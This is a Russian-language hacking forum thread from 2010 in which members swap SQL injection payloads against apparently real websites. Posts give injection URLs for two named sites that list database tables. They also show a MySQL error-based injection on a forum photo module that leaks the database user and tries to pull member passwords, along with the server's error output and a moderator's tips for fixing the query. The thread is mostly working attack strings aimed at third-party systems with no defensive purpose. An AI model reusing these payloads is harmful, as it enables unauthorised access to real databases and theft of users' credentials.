 |
|
01.07.2010, 20:52
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
другого ответа я не ожидал))
|
|
|
02.07.2010, 12:50
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
|
|
вот еще одна гимморная скуль:
http://www.caffmoscommunity.com/show_review.asp?rid=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES)--
а вот вывести имя второй таблицы уже проблема
|
|
|
|
02.07.2010, 13:15
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
С нами:
9124815
Репутация:
10
|
|
Еще 15 минут назад сам не знал. но использовал гугл
http://www.caffmoscommunity.com/show_review.asp?rid=%28SELECT+TABLE_NAME+FROM+%20I NFORMATION_SCHEMA.TABLES%20for%20xml%20raw%29--
Информацию получил с http://raz0r.name/obzory/select-for-xml-sql-injection/
|
|
|
|
02.07.2010, 16:27
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
как быть тут?
http://fixwap.net/ru/html/complain.php?uid=-1%20OR%2017-7=10
|
|
|
|
02.07.2010, 16:31
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
С нами:
9540826
Репутация:
479
|
|
Нуждаюсь в помощис флуром.
Сообщение от None
DB Detection: MySQL error based
Method: GET
Type: Integer
типо самописный модуль для ipb 1.31
урл засветить к сожалению не могу.
запрос возвращающий юзера:
Сообщение от None
id=201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
result:
Сообщение от None
mySQL query error: SELECT * FROM ibf_photo_albums WHERE album_member = 201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
ORDER BY album_time DESC
from_file: /var/www/***********photo.php from_line:193
mySQL error: Duplicate entry '~'mysql@192.168.0.1'~1' for key 'group_key'
mySQL error code:
пробую выбирать из таблы:
Сообщение от None
id=201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
и получаю:
Сообщение от None
mySQL query error: SELECT * FROM ibf_photo_albums WHERE album_member = 2059844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
ORDER BY album_time DESC
from_file: /var/www/***********photo.php from_line:193
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.t' at line 1
mySQL error code:
|
|
|
|
02.07.2010, 16:38
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
#Wolf# попробуй зачарить
|
|
|
|
02.07.2010, 16:45
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
С нами:
9540826
Репутация:
479
|
|
Сообщение от Konqi
#Wolf#
попробуй зачарить
Сообщение от None
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'char(105,98,102,95,109,101,109,98,101,114,115) limit 0,1),floor(rand(0)*2))x fro' at line 1
mySQL error code:
...
|
|
|
|
02.07.2010, 17:05
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Таблы хексить нельзя...
|
|
|
|
02.07.2010, 17:11
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
С нами:
9540826
Репутация:
479
|
|
Сообщение от Ctacok
Таблы хексить нельзя...
все равно не работает, уже все перепробовал.
|
|
|
|
02.07.2010, 17:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от None
id=201255656844 and(select 1 from(select count(*),concat((select password from табла_с_юзерами limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
эм =\
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
